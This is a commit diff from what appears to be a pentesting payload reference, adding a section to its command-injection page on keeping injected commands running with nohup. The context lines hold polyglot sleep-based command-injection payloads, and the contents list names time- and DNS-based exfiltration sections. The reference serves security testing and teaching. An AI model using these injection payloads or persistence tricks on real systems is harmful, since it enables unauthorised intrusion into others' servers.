Merge pull request #583 from nzdjb/nzdjb-patch-2

feat: Backgrounding long running commands
This commit is contained in:
Swissky 2022-10-22 10:29:30 +02:00 committed by GitHub
commit 9f37576173
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -25,6 +25,7 @@
* [Time based data exfiltration](#time-based-data-exfiltration) * [Time based data exfiltration](#time-based-data-exfiltration)
* [DNS based data exfiltration](#dns-based-data-exfiltration) * [DNS based data exfiltration](#dns-based-data-exfiltration)
* [Polyglot command injection](#polyglot-command-injection) * [Polyglot command injection](#polyglot-command-injection)
* [Backgrounding long running commands](#backgrounding-long-running-commands)
* [References](#references) * [References](#references)
@ -304,6 +305,16 @@ echo "YOURCMD/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(
echo 'YOURCMD/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/' echo 'YOURCMD/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/'
``` ```
## Backgrounding long running commands
In some instances, you might have a long running command that gets killed by the process injecting it timing out.
Using nohup, you can keep the process running after the parent process exits.
```bash
nohup sleep 120 > /dev/null &
```
## Labs ## Labs
* [OS command injection, simple case](https://portswigger.net/web-security/os-command-injection/lab-simple) * [OS command injection, simple case](https://portswigger.net/web-security/os-command-injection/lab-simple)